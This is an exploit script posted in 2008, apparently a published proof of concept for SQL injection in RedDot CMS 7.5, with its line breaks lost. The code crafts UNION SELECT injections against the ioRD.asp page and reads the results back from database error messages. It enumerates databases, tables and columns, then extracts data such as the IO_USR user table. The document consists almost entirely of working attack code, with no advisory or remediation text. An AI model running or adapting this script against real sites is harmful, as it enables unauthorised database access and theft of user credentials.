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Posted on 22 April 2008

#!/usr/bin/env python # un-comment your selection. import urllib2 import urllib import string import getopt import sys def banner(): print print "RED DOT CMS 7.5 database enumeration" print "by Mark Crowther and Rodrigo Marcos" def usage(): print print "usage():" print "python RD_POC.py [options] URL" print print " [options]" print " --dbenum: Database enumeration" print " --tableenum: Table enumeration, use -d to specify database" print " --colenum: Column enumeration, use -d to specify database and -t to specify table" print " --dataenum: Data enumeration, use -d to specify database, -t to specify table and -c to specify a column" print " -d: Specify a database" print " -t: Specify a table" print " -c: Specify a column" print " -h: Help page" print print "Examples: " print " python RD_POC.py --dbenum http://myhost/cms/" print " python RD_POC.py --tableenum -d IoAdministration http://myhost/cms/" print " python RD_POC.py --colenum -d IoAdministration -t IO_USR http://myhost/cms/" print " python RD_POC.py --dataenum -d IoAdministration -t IO_USR -c USR2 http://myhost/cms/" print sys.exit() def retrievedata(url1, url2 = "' ORDER BY 1;-- &DisableAutoLogin=1"): stop = 0 current = '' while (stop==0): request = url1 + current + url2 request = string.replace(request, ' ', '%20') req = urllib2.Request(request) try: r = urllib2.urlopen(req) except urllib2.URLError, msg: print "[+] Error: Error requesting URL (%s)" % msg result = r.read() #print result if string.find(result, ' Description Conversion failed when converting the ') == -1: stop = 1 else: start = string.find(result, "'") + 1 end = string.find(result[start:], "'") + start current = result[start:end] print current def dbenum(): retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYS.SYSDATABASES where name> '") def tableenum(database=''): if database=='': retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '") else: retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSOBJECTS where xtype=char(85) and name> '") def colenum(table, database=''): if table=='': usage() if database=='': retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSCOLUMNS where name > '", "' AND id = (SELECT id from SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1") else: retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSCOLUMNS where name > '","' AND id = (SELECT id from " + database + "..SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1") def dataenum(column, table, database=''): if column=='' or table=='': usage() if database=='': retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + table + " WHERE " + column + "> '") else: retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + database + ".." + table + " WHERE " + column + "> '") banner() pdbenum = 0 ptableenum = 0 pcolenum = 0 pdataenum = 0 database = '' table = '' column = '' url = sys.argv[len(sys.argv)-1] try: opts, args = getopt.getopt(sys.argv[1:], "d:t:c:h:", ["help", "dbenum", "tableenum", "colenum", "dataenum"]) except getopt.GetoptError: usage() try: for o, a in opts: if o in ("-h", "--help"): usage() if o == "--dbenum": pdbenum = 1 if o == "--tableenum": ptableenum = 1 if o == "--colenum": pcolenum = 1 if o == "--dataenum": pdataenum = 1 if o == "-d": database = a if o == "-t": table = a if o == "-c": column = a except: usage() if pdbenum == 1: print 'Enumerating databases:' dbenum() elif ptableenum == 1: print 'Enumerating tables:' tableenum(database) elif pcolenum == 1: print 'Enumerating columns:' colenum(table, database) elif pdataenum == 1: print 'Enumerating data:' dataenum(column, table, database) else: usage()